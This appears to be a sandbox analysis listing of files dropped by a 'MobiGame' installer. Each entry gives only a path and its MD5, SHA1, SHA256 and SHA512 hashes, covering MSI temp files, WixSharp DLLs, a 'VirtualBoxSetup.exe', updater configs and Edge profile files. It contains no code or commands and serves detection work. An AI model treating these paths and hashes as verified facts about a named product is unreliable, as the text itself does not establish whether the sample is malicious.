C:\Users\Admin\AppData\Local\MobiGame\logs\mobihelper.log

MD5 9e4b3d4ce609ef4fd7651c3fda9c0ce4
SHA1 5b08f6adba66c201d93110b410c89743276eaa67
SHA256 07e53f6c5b70e3cfed06863c612db21830338e74ec680fb88f0c81b3979526b9
SHA512 06ebd138a4c15fa238f02e5a21298b37dce56d0badd8be980879bcdb407b618a4dbb230f48073b008c5fa690a9ad9f9f35ff6e5e56c08515c634d8b6a41959ed

C:\Users\Admin\AppData\Local\MobiGame\logs\mobihelper.log

MD5 fc5006e0277c73fb7f053c206d61377a
SHA1 3eb4c232bf2e3e03340899b0e77ca99025364c65
SHA256 ef2706787137f423f44033697430e5f8f588ba08c3728c280efa0fc2537f2af5
SHA512 4aee5195702e522ca4ef7b80b747c81ff420c5af26f90dc2e780241e6e176c54ab7f179839671891bc9758e3e16b099a1e425ef7a066ae68e90f891dcd1a74a2

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 467d154d6ca29f47ec8feffdab6f12fe
SHA1 2ee035ec34c05d9c3743011ddefcd24eccdf2c03
SHA256 f3296b0508c0aa65754f65f1e6b32cbadfecb4fa8ee1b85f7bf34791cf082cfb
SHA512 f1567fc0f894a8548af20112e5c6868148290ebe32cef73b2fd145bb7b38d9982b12c469797667f816c1a5d2caac0fc25859fa6a866103006872547a929e1b93

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8572970ee17afc2d018a8f6c40470de4
SHA1 f8aa9fc182e9b3e40189a7236a23bce03e7a052a
SHA256 eee55c8ab66b867ec543b5f0f6dcebcdd27afead7f6313f5869c5c6b153f575d
SHA512 b9a222166b78d3e7946a5373c7832534df41d9f1d07aa39fba944d960c0c38736a879a1f9bf0072b37b05a8fdfeadb6d1ea755a88e915baa602ea8fe9e22fa3f

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4f99069a57b5bf698f863efa98671420
SHA1 84c14e03babec8f904fdff79681303d0e59246b1
SHA256 6b4602a0bca6c675d80114a57b2be9e0dd11e6820d1b8ff1b8f8f882b8fea3d3
SHA512 4e0bfe4616808c7ed91606eab053cff90f75365c27dec5bf425996ef5b54a55162294d47cccb34f04994e72f712f057b2d4685dff3ff94290556d208d3980a2a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 1e02ce58d6e6d11048b8f462bd4efb81
SHA1 1a94378a8c0f83b4dfceabd5a8676b245b770137
SHA256 7bf9bdf561b3dfe26d22f9ab1ceac38b7e36642bdad05eb2c84876d2053f850a
SHA512 a7a649a9acd5cb14c7c07413a42a293397a23424b6ec48408144c10e7f076fa6bc3cb0e583133c158e3060f588f0901a579a5c302e304c0c35390330b23e9d1d

C:\Windows\Installer\e58bd3d.msi

MD5 304b4474e1d669d41023efc22fe977a2
SHA1 5df31014a50d1d48632dd3da84090054d4ced4ec
SHA256 c4ffaaf921e6a0899e07b35b70af0b1722ec551af2c41f406bbfd7c6d50f0fd7
SHA512 1f05ca61947707b917deac9134191fb0547baa260ba1b6c969bd63623c3871ba5976dd71680e991c3f418d3c8ba60319e0c457b1330f00bc8653dceaab552a47

C:\Windows\Installer\MSI80CA.tmp-\CustomAction.config

MD5 c9c40af1656f8531eaa647caceb1e436
SHA1 907837497508de13d5a7e60697fc9d050e327e19
SHA256 1a67f60962ca1cbf19873b62a8518efe8c701a09cd609af4c50ecc7f0b468bb8
SHA512 0f7033686befa3f4acf3ed355c1674eaa6e349fba97e906446c8a7000be6876f157bc015bf5d3011fbbdc2c771bcbaea97918b8d24c064cbbd302741cc70cbc7

C:\Windows\Installer\MSI80CA.tmp-\Microsoft.Deployment.WindowsInstaller.dll

MD5 4e04a4cb2cf220aecc23ea1884c74693
SHA1 a828c986d737f89ee1d9b50e63c540d48096957f
SHA256 cfed1841c76c9731035ebb61d5dc5656babf1beff6ed395e1c6b85bb9c74f85a
SHA512 c0b850fbc24efad8207a3fcca11217cb52f1d08b14deb16b8e813903fecd90714eb1a4b91b329cf779afff3d90963380f7cfd1555ffc27bd4ac6598c709443c4

C:\Windows\Installer\MSI80CA.tmp-\WixSharp.dll

MD5 02551708742c3e7badee72532c9484b7
SHA1 d5aa394ee2883a0f4648698fb7d1f54039f3f73e
SHA256 0fc8edc2b0bf3b92ab50c08429b03f7612fe1fe2e1216a4d9266f11058e3e95f
SHA512 0cf5c87831e4d82bc09decaba0c99ae71044a59b97ab61345a1e5e940766227adf27e34593a8642d51ea5673a37e510e8ebf81ebdbb1bcb1777d48a738520e7c

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 c67fd577c9f814af97dfc7df124d63c3
SHA1 2a9ea5b6b798993dbc9587021ff20d60faa7ecac
SHA256 ce25760600cd04f68a95ccfa24f18ed99b1d12c8fb9beda6a4c1ea01ac64a35a
SHA512 a1355f31cfe018c0f7faf9611e69792b2dfca8ea63b145a6b7666fb6e20174811ad1dc8ba5f0a182fc5bac75963a6aa59f936a7a53a83a393812d2477495380e

C:\Windows\Installer\MSI86F5.tmp-\WixSharp.UI.dll

MD5 a8d11ee5c3dcc54d8082fd2c087c7977
SHA1 8191c9e82f4e6f67a427a5f3b7b1a3bcd67cb4ae
SHA256 c29d2aeb1de17211adb98a490051d83bfd05d10af66094ef7159d0917bad35cb
SHA512 6462a7d23e571b41791af130ae0d2a0e010e30705a66e96b716028a0fe08bc4c7669b78ec4e56aedce991872336b0da7bcf1845ca5a15e621fa91d4c05d9f9ab

C:\Windows\Installer\MSI86F5.tmp-\VirtualBoxSetup.exe

MD5 27640e44b220c919539bae41d28bf738
SHA1 905bf328be2083c9020159823f28af81017fe60b
SHA256 1f362754c05cdcc75e0d85c81ec8b7e70e53361ea549b3c16eb7629f78931485
SHA512 1c47d4e2424634f18d1f315f2cb81287bde3bcca0cb38c779e4a0e9dae8ca75b15d59e6968aa1f42950addd5969204fd040f7472f77cbde9f26c6b6143ff1ff5

C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bf27178747118a828ecdc8b1f443d39b
SHA1 4d119f526c2858f7d7c5340bb9b00e73a1000cac
SHA256 8ca0b59905e7b71a341a8c2f67124929dd4421267bd31533030e06ea6e35887b
SHA512 747b5d9a7349447421664e85e93af32929b867eea6756540dbcdb4c2c638b99cbca0940799284c8b686cd529486b939e0c3e8a394780c88951a319c9daff7dbc

C:\Windows\Installer\MSIE26A.tmp

MD5 62b5ccfec974966643787a3f6337d1b1
SHA1 f3134b4aaa47cdc2450c8fd3d0453807456a300f
SHA256 1ab810303c188710dba49cabc5a4d623b1e4e3798b2af2388e6c63eb6c8e1405
SHA512 4ce1364b28617907ebe1c0ceaa171fc13c2b12e72aba78c38824dfc62e2f2eb30f3a4c910e14f65ff881c606b654f75f6949d18cc78ce9823b0b9b2eaf1417f5

C:\Program Files\MobiGame\log4net-loggly.dll

MD5 647ef1d7ccf030a09f17a54c5f40bbed
SHA1 08a71074606354e53a5c25aa9b084dfe9bef551f
SHA256 dc7ba0dcf33d3599c6d471cedb604e141d24a9aff9964225b8de1dfbb8a285db
SHA512 16d7dfc6033114c247c252f5463ab874418b609811ef31dd82365482487c6a8dcb2260f9b288fa883d3ba70c8b8836bb9e38d5bc24303db71fdcac8778b769fe

C:\Program Files\MobiGame\Microsoft.Deployment.WindowsInstaller.dll

MD5 82eb1ccf28f3af897c2db27282b41156
SHA1 9f945d8b18ff0fbb5f013efe5e2ff33aef136104
SHA256 ced6cab3c04c08ce5705af0b6986965dbdbfda17cbd66c973bb371ed3b95f37a
SHA512 9458fabeae4dabf8109b9736496a01d9168312faec1c17d6eed89e8f09cbb8287d74ff758948cf07838720c11005e87a734e920be4ead275354f46a0a6176f84

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c360e82ecf855ebb33b1c616024708d0
SHA1 f3a954423061f9f28199826648f8f8aad9643bc4
SHA256 c1dc0031628003ec160103fc35d2b0b724183293ba7ea639519cf93f9be659af
SHA512 c1952bbeb05131ab12adfa1f10ad9d2f8b99f61683082c5aca3ccba12ef195e2afb72eb391e15bf8e9dad93657f2492d7ecd72f5faa52e4db134f3dc393c0c7d

C:\Program Files\MobiGame\ServiceStack.Client.dll

MD5 e7eeaacea4bb7ca8625dbc72f9c05177
SHA1 6e540e594d4e7fe1c55f2f9e406d3c0f6d02af9d
SHA256 67f5c0fedec2ca57fc1b3118bd772b987c01b573584c08c4264fc8030f0944f3
SHA512 9b45ab2f9b865da7775405eb05b805073f37590573c50b70644c6e694f2e6effa5c9b0cb15ce30b184f8afa71a382bc4bb9096599ccce8b68e130131da502c2c

C:\Program Files\MobiGame\ServiceStack.Interfaces.dll

MD5 bbaa88e5567a6b9c134f28262c54ca65
SHA1 5d59256abbc0226d4966cfa7f96511453736bb63
SHA256 2e2cf708db9d86b04c62a6273aa326225181fb739f6b950fbe2e1bd4905ecd0b
SHA512 eb714c554123a9405f1beb952e82f79b684995a4f567f3fb9bf934f51496eea0d325c791fddafc2105922ca51f93132db85ee8b555880ac04e0e039636c58779

C:\Program Files\MobiGame\ServiceStack.Text.dll

MD5 01e10fdd82dff5e70eff077adc2a4528
SHA1 5bc845e65e732c4bbc246174eb18874140d26772
SHA256 57f75c075376c8977860c3bcb8d7d693289450a08b569159bf7ed1dc1824e1f1
SHA512 fe0f0e8c14d6a8318a1a4320e427375b309e2ab5f05286ecca7d7ce1c3047c75054cce2153233c07bf7a921d43fea3fc5093af928bb7b555de46dfa2adb55366

C:\Program Files\MobiGame\System.Memory.dll

MD5 2bc5de386a4297144781d15b8e812b63
SHA1 ae6b19d49b413f1549b3540a9fbba00c1e8b3d27
SHA256 9c266080fb5f31e02a5005b91657093bd8c1faed23102e021a8be283c1753461
SHA512 e4d43c871af5c03392d2fb139fdf10c2f2da2f1d6fe0edd089e3e30369d6d350727b483c98868626f81d680400b44ee4d328e475b0017bfdeb38cdb44a8b4d4b

C:\Program Files\MobiGame\System.Runtime.CompilerServices.Unsafe.dll

MD5 a5aa80f49ad64689085755ab1ebf086e
SHA1 27e88cf0d2b34ea91efaa5cef9a763ee2722c824
SHA256 a79e1c30e9308afe4d680f0bfb82de3e8c1fe94aeca453ec4092c3ed4789ae6b
SHA512 f3dbd77e3a2ec3915b34d1387388abad45c99459ce03c06dc9a83d04f751b837c7b56cf9b4b7630f7fcd897a1d8057fce4cf761b1dc140a3928431b22b9b5b82

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 14858588a332ecf5ee5c60e8e13ea311
SHA1 f7e62c9d456c0a200f8ce62af6eb1a91bdd27e8f
SHA256 1103c36c7889c7ebb3f81be903511effa7cc879a56b6bc074e6bd9e3efc7cde6
SHA512 e808684d4d67471b2dc813ae4276ee9e3a747248d19ea87efbe1d4f7378e8cbfea99c7465cab118b5d591db8a19c28352f86b5d4d00bde2bf9a2fec713a854d3

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 c882ced5850137b163b77ab4e4dfce20
SHA1 90ec6bdd8ca0fc46fd901d72e9a216c9e748cd8b
SHA256 2bc8f7193a4656ca20789da630d9100086051463a03a49a8d4c2c7eb367babe4
SHA512 ad071966eee0ecc20e670ca067d47a5143e69fbb89664e07b83ac8a4c05fed4c3156eeb71376d500dfc2c4a012716e2fc0129e1c6055ca1fbacd23e227dfb7f5

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 5caa6662c8c8dfea0e2120c8bb4c7c15
SHA1 23918ec86fc496a4b70626d329ceba01002e31d1
SHA256 e1b4cf896e0a3cacc5820c7f90fe899d9b6f6dd92998f3f84b374143ce74ec46
SHA512 678c39d1a711c9046040032bd8bb8c215463cc34ba1fdca001757af33df7b363a7f2990b8887ff8af2b083748f0917222f12d159af4d664962961fa92678c2e9

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6faf316c59d9ec4d2fba0a63fc0a6a74
SHA1 364965c0707a31e8c369831715be888472bd4cb4
SHA256 1bf61de8d01ca115f307c5a8bd153c71fc4c089f7661daa83ec815896de7304e
SHA512 acd974767a6b80ee54039140f3a969ea3fb505569509f852b9b22b32aa27eaebd4f4584e8bbf5d8b0aa51ef27b0839da1aecd449e159b28c1caf855b75cf9139

C:\Windows\Installer\MSI744C.tmp-\VirtualBoxSetup.pdb

MD5 4941344d7237566c0b791c865e579fa2
SHA1 02b9b4d37e5c5ad76349697c343ed7c1c689bb36
SHA256 3dda70ef422bba7ca5a69b7bdfdce227c47e698bc27c4058cbc798ce48c9a030
SHA512 c7aa71e6550c1049b88f231fcbd94e95b2e89025a4160921ceefc1aef6931d81ec05ccd67ebe9975027e1246a059efd42d2284e18ea9d922e1a8d9e789063b31

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1c1cbc60a7daf8bb85708372c3b569ff
SHA1 6d6b343fbc9d79bf69a4ce61fd3ece6037176420
SHA256 b1664151aa07dd2dab3d7f87e87fe8af250977dfba34c0a2e32b0deffd9d9c78
SHA512 45a9cbaa9e243362b691e02598c94582861d42bd8e3d80d911475edc5ed6aae3eed8c6d61f4d2f4e38632299f3fd87875c8fae1cd07aa2574d420abb810320c3

C:\Program Files\MobiGame\MobiGameUpdater.exe.config

MD5 fa28b3b2cd7e4c4a8daf045f5ea9b8d3
SHA1 92a68038e6ea95394dcb8012b8fd6abcead3637b
SHA256 b9a467f2b7839ab4c3eebf6db57eaeba3076b14be3378f24382913ee41f79e3e
SHA512 4bad76326a489f1ef40ea81c2f8c58dadf2027636aff1a1f513ba328c0a65e73f57d1eac5b3e5a8c42fc8455c7709ca51bef8943edf338bdfd7040fc49b5114e

C:\Program Files\MobiGame\Communicator.exe.config

MD5 a1542da1b06616171d711cf143c18e93
SHA1 2d661b2def0a3377c238e76af5636e61369d6d61
SHA256 d2b4784ab623981ea29243091bbcd49081dafa30211a00135a32f30b9b83f71b
SHA512 45ff0605a99aaeb35539349386adba60d946971463dadf40c1e7e483530074776eebc093c5f08676cd7b2e4c2b96ab6b804cc85d43b567db94b6193136bfb03b

C:\Program Files\MobiGame\ptglbnuu.newcfg

MD5 9e083eaa17228a0fa77f70921e94d34d
SHA1 481fc382b1cffbca84d5aab4438f48702950cafe
SHA256 7259583e7be390d19192141ffe5ee5dcd8ddca8933ad7b636063749a3e6f6f6f
SHA512 0709a6651aa0a79f334cc6547c49d86b1f9e58543d71aa38daff55c1260fe981299cf240a19c499db45ba203a6b1b6afe3aa0babf8f8b100a7357ac15d0541a7

C:\Program Files\MobiGame\Communicator.exe.config

MD5 a4a318e85df543bb4bee362f061eafaa
SHA1 39b6d13872e5e1dfb5260ae48d6d4b313e16329a
SHA256 3ffebb3ce4d2e01757cbe0495c2919181a129e6f969d9a8a498e8c28912bff99
SHA512 54f949aaf669594cf21fd843e5650d7b96d81f4e57a751e7293d112b76af9b442c6c4369954bb2a92fa5f93d4a9286f238e858973794eb65344e0ce94495cc22

C:\Program Files\MobiGame\MobiGameUpdater.exe.config

MD5 db3d10dff27df2a7d053afb24e469337
SHA1 6a36aa3ff2822007465b70f44c166c3b226f40b9
SHA256 66ce327876d2f9b600fd5ad7f2e94f629595ca2016370f051176cfbad27575e6
SHA512 743124c5e5ac4ac9ffc6d8e848c83bc67e91955de4a53967bafe7279f18843ed84da3d80695863ab2b58a7396b8b90d32a4181e5c5bbc3a3f3d2d8a8107340fc

C:\Program Files\MobiGame\gsz4gri4.newcfg

MD5 4d57b07cb3216d228db1714967832dc0
SHA1 db51e9fab6778752f7e0f35193d0698976f0aa0b
SHA256 f32e9235fd4d742095b2e83a783ae8930c991d3dfcec8d47b397835adc59dc7e
SHA512 008ba8c07e1db8446ec430748272530e2014def4d3293464adb18c89f22fba20f11d13fc2521605e6cb97436958d63b129d85cd446ba7c0edba8724f4eb3539b

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 5dc6973653a960d3ede16fd22d6485d7
SHA1 9ca804f509a6e42a309df95dad613f9c40bfebca
SHA256 f48056014c50a55e6a99c9bf20d8fd9d54e674d5e7eb2b2a1c935a6444a52dee
SHA512 b6d693d4e10e7d96777bcc7f5318ba469e81205cb6e8cc9c5e8ef6b03fc34be2f479c4c7356f86e31aed6790c1893e86075af3ffe7d6f3f599c98ec86272b44f

C:\Program Files\MobiGame\MobiGameUpdater.InstallLog

MD5 e23cd35078ec3585e3ad3f4a49a195ea
SHA1 c798ced2882ba76bf6cd2a305c63f032d34170ad
SHA256 ca6c6f38a25e005d35d405335021cb2f86f9eed57e2c410ff18ae5114d446bbc
SHA512 040ac655d86f98c6f86f5bc88e3ac41012bac58f6951bc88ba9ff09ac29f403806d320eab306cbb9ec7f0aaa8bee4df8723fb37f3fea496e9bf1dcfc01bf7c46

C:\Program Files\MobiGame\MobiGameUpdater.InstallLog

MD5 349e0bdb3112341296785ceb24e5af3b
SHA1 5500fdbe799b225d4205ddbeb35f0b5a775bc157
SHA256 d869115f03a7b277ddc93e5683722047f0bca52a897608271513a63edb2e7a05
SHA512 927405cea3bdb77177e8c74c9d488565e54a879fc6e51e538a05e775e25f6d7a4c5e84353e4b46e810c5d87570a41f81c41a2f876e085d9c17887f359cd04f21

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002e

MD5 9f61d7b1098e9a21920cf7abd68ca471
SHA1 c2a75ba9d5e426f34290ebda3e7b3874a4c26a50
SHA256 2c209fbd64803b50d0275cfd977c57965ee91410ecf0cafa70d9f249d6357c71
SHA512 3d4f945783809a88e717f583f8805da1786770d024897c8a21d758325bcd4743ff48e32a275fe2f04236248393e580d40ae5caf5d3258054ea94d20b65b2c029

C:\Windows\Installer\MSIA96D.tmp

MD5 ba3165ec14e657e6235d6d789e9e25ca
SHA1 f626fcc0e7e7f26a092da6a995f5936a45c4f71a
SHA256 bf93de4755822425f3fd3928b52d2a6e6c91ab069213aaaa95695ed3e17e72e9
SHA512 6d83dd60b1f8e8d93ddbda657b1c75f86c1f5f6eac899123f6ce498f5dd1a5abf05e29776144044c6a848e8fdd2b9a6a5367c4b249b879a310a260fb6b55b6da

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 914d05cff5a6e9de25e50ae73cad33fd
SHA1 9f967c880924edb84de13e90b8780e1ae27d2e18
SHA256 7692e5e22d50c1e5aea6e24388b87115ded19077ef72a40ac0e0222a92d3e4a9
SHA512 e4ab07254a5eab596d969a7d40f94e3fac37ab5385d66686cf89efd05ab31d00460e304ea79183695f5edd1006c88bf8e859ad65f37dce7934b72a0aa10e7566

C:\Windows\Installer\MSIB277.tmp

MD5 9d9a45f017d425179b7907410fd4d124
SHA1 d466dacd22e4daa5698ffc2a812a48b8fc680d71
SHA256 51f05b7aec5c1e565c36b33a456ce2e3500669399abd9ead2bd217d847805415
SHA512 f9336ebf658f24c235105b4845f1182e06fa6bca38d32a6b07774b6bddbb29cfb64cc174fdb25c2b00e4fdbf25fdf32df5229f156b5eb1f4d06a4f3b9938d1d2

C:\Users\Admin\AppData\Local\MobiGame\logs\updater.log

MD5 d5ff5b8f92f6066dd85ed738ed26a6f6
SHA1 9bad6d668c0028049c554d55ed53d3ab8930ffa0
SHA256 8f2a0f2a3ffa57ace8abe312fe4e79bfb5137ec180a3e60c3585ca8fdb0c9d80
SHA512 44eefce8fcc630ee0cc4f54bdae213a268f5b191cd8277ad89e5d99691a8c174b36be50d045a791d2ac757ec786b0e1fb40504860d8a37964c83c061bd52ac9c

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 becfc98560d2dd9f09e55ff63bef56c7
SHA1 45ec73e1a04389b9d5967df2222831e0c8cd0a4e
SHA256 17c8ee9bf801aa9ae3f854443729eec5f4ced7d57eb85eb2080153ef3c691da3
SHA512 5b3b446ee1969148aaca5ad61eb9f8e09e6fe71b153077291e41fadbce7f1f0ec79e63110cf61dc874ac04e98642c0432db9ce7da9dbd096ef04f171fc6fae5e

C:\Program Files\MobiGame\MobiGameUpdater.InstallLog

MD5 3a807b488a660ac5752b02b04a719060
SHA1 db62b98f71e8dafab33ca50ba28d5b4c8fe42a76
SHA256 6b900282e4bfc69ec22354de4d8204d3a43aab7f6ee0c5ba5f2f1ce47055b8f0
SHA512 d19f892cdbba7dcebc03650d49b3de4b2850f3cc097215686e6873dde65ec0e27fd59d7329abada2ec18ceb29d665705a4a95d678925c43b83f8e5bb01133730

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 2e9bc369952623fae38e32c6aefabc3d
SHA1 b5076438da090fd9093e04c71d23d973127dbf0c
SHA256 e5d75c37d28fa335ea418d735daa18c2d5b0d2fc6c93021409859ce0e843bbfe
SHA512 cde070a0cba1d4490d73b54d7e60372b0a9478cbc39e77a6141b3090f9d4a935db5d87259771ce06629beb3f71a097f937ad8c23fd46b12685d2d71c9296f302

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

MD5 f0d11cde238eb54a334858a3b0432a3f
SHA1 7c764fe6f00cab8058caeba38eb7482088a378f4
SHA256 579adf148a5905868140df9075b90a2ff33c9070dfd35b3ab869a2d9aacd9a96
SHA512 b3e590c88b462004b29ced18027f640addd1ea6ce9ae584820054ca508ce7d626acb3bd729e3693b50ccdc5e4694b1aa400cb33a315a475de47f5b25ed964d02

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

MD5 58d4ec17141f90f940c0c8cf1babf0c4
SHA1 188d4da38593a7fbffa950c4d7017a40bca8e8f1
SHA256 07a29e19ab31e312a9bbe223588b66408531bdca831a97fcf79fd30206010d4d
SHA512 fffa1a79c33b2212974a50474a1798a20e0667befa77391f97124347bbefd4bb7785e747aa02482240cacff1a5305c4d92702c7467554a0f0e7660105e8b9a24

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011

MD5 873c4764c2a7befb6d4d78650fffa6cb
SHA1 3052199d1a09e6aa9a48667267a1a65e01925785
SHA256 c6396cfb3b709128efd82810adebff888f1af62d634f882abf05b09cde839b15
SHA512 385d88634055001bcb3526b0878f2a9adbc02b77e60d0c72a3cc9d81c0c8e59aa7ec04f15e7d80e34ec416c876631288171c8924ea91482b12f7b8ddf37bb2fc

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7a66eef240ccf248e032da36c50f7cd1
SHA1 dce5cdd9f6c882bb454a217d5a6b3b471450ace0
SHA256 125c578f94df41f029649d67944c0dbff18b5dce2b4e1acb7a72b49b6a49f7dd
SHA512 8e65bf92b786a2a7cf2d8c8258019ca453f4c833d64c3aebd25a5c8c3fb260a398e09c3ab59f5e295fb218a9595600f93a402aec8dda9927ef1a202417ab7391

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 74087ba211d9d81446a0d09dbb26e7ca
SHA1 2ee1cee3beb96ff077369a512abd0630889f4f8e
SHA256 fac24c7cfa9369a7718271ca3228c0c3a59661b0c7e41c7b5487de3aa5acd3d8
SHA512 af57ff69202b8cc6e358ba980f4036653178605c8ab1f55d294f7dc782cd0111b62f10fb70324795113c76652579c68f0978787288d1550f4ea1aaa15883d9cd

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 9b328849efb0e32db08924c40270471a
SHA1 9fea94826b87e3033ca6319dd281b6f3a3258a13
SHA256 f82642046640a09998c813c52a0f6c6a73e83d2797b9eecaf06d833af0354404
SHA512 841f97d5c0c231a3e98e7680e1118e44c8ff88a8a105c8977e214160476b709b31e2ed4f1f03e2068fe63e6b48b918b217784f7c4030f7595b829488cc13642e

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 bd04a72b8c4ffa3156d21e6e191fa780
SHA1 e6b776dce5975d5431f2b7e39695ad5f8645ef4c
SHA256 c5f1a57ca78394a929238ac04ab8cffa0b00b1840bfa04bbac9eaeede50b4d4e
SHA512 94467a58fb74acec0f88be6dbcd7b8213d8facf67a91a33f04d34a1179891b43fe4911962d19801e9ae9e8298846d4e0506100dbd1fff038c43b4a505e11b939

C:\Windows\Temp\9c144f74-fa46-44e5-b2e8-0ddca8878734.tmp

MD5 4c4408ec294ac126c63d8d10c4c19c4e
SHA1 1bbc7e51b5e2af1721fc6625b8e4e912265cdf6d
SHA256 ee249fd2eec357d14115f56478607c8df29b80715ebe5e194a99c6b8974e06f2
SHA512 aa52f7becf1abccb5a456d23940166a21b7bc44916a3519e79f539ace119b023f01445664e1859a9e7bdc656a35a19aee301c93444a88c3bc97b1a5ff110ac94

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 79e57fb3bf4627caffaa22d3b286fcca
SHA1 b6c091e6341e7453f3a4529c9d1e86569b8e5d9d
SHA256 f2144fedb0ad51abfd6648620af72f952214330e7e5d76f29e6c98da6c2614d8
SHA512 dd5084f34667fcc5e412a60bd3565329bb02cef7b52f3d8106f833eee52c41f68ec87bb998102b794b82a0dcec23463738be22000d5952edeee4ac5c0ffd7583

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7c8f3e47592ed4493aa19e39ea1c53f7
SHA1 cc2f88ebae32cc0297d7cbc2542e3c8473bece4b
SHA256 0355e2e7bf4d555ab64349acba328c09262a3d0caf5f533b9ff904cdadaac4df
SHA512 701e4a7f7b6fc28e4f71c5a56f507a62054250ea108219e020bbbffbfa9924fb3e854122da9aa7e9b67588746912dd953724415f450c6b3a4dd821edeac645d9

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

MD5 0ab878834e3bf6b5834def3e40883c7c
SHA1 81e1daf48c638ed8511d137d8ad7b0caab1cd115
SHA256 98ce5a8c51ea23bdd76909a1c0a67871b4450600274d4c1e321788671d3f44e0
SHA512 c287ae52907b40691f265a9ec82e4f7c5481f15a545693430ce2736be3f1f33d501d51bf4d18fba79c3eae42cebab77733ca3a1691031a029383c470dcdcd889

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 209f571a14eece31960aacff9e638c73
SHA1 f74ec42f01ab8a64e84ae2d71bcf8c570fabfa1f
SHA256 52efff2ef755659ad93164e7400cd1d7196206a2b069c7fe1dae850072def832
SHA512 7f7302faa5070a3844f58d8c2dc982f2465cb4b3f2c3b7cfe3f7138a9628f7ceb9e3d5def2c436240dbed946754197df74c1ad41f2ecceab4fb9b7dbb45f50b3

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7eac20d778c303365c14929d3f3d38ad
SHA1 4f0e8949aabf53fcea12f0091320aa04c851761b
SHA256 17485722b7ef433c449b8a5a849fd6585987b1214971640143050b2211964238
SHA512 2f0899ab5bb6fa50eb428eb3bc32f3c9eb716a225661b4fd08b0c90a750c1499045f5ccb8b59c1ab9fa7f5adeffbaef72f3851bea1d37d7060ae97f77fa6d769

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 20b702597910281b5aaa031ed3d3dcc9
SHA1 9cb2b819c766cfa49fa377e0caeb3a9d92800007
SHA256 ad9dfa2dc20bae1557d96d71ceaa82b097214ee0d6ad71894dbef9459479eb13
SHA512 29791ece8a81059e078a521c44475cf7cecc3cbf9716eb57bb7b01bad6784ed65d67112cb04b185c9efe649f72b9f42a01a2c317c0bd45531d7bcc93ffebf7cb

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c8f966d41a8deb33c83a968bf88a7f13
SHA1 d63200a6250db4bcd44d448e28b13180fa57c91a
SHA256 1ef5f37826465b46932344a7243e55086a297fef595f689f61f87bc056cdad00
SHA512 2f62cfdff39bf74609a1f0db81708ef70954521c65e6bfbadcce5c78c1e585f1dbf3936c5500b34dd1e2b096be4b626fc6b2e12dc64af2a624dfa4334f40eb9b

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 017449765cca4733ef3be5df63676642
SHA1 baf6bf700e17f85dae51626ba61d7b7c7c9ab04d
SHA256 0cceda6f66ad52bafd7ec78becb13a4e4cc2717b7a305064e91d8714c4bc6443
SHA512 0c775c460f25cad79331c5fd6502bc8bde26cdb40c7024aebbfb1f3da8493afbd32328375af37188dc5e62d4d2fcc91adfab261f42598d74a4d457dd2cae164e

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

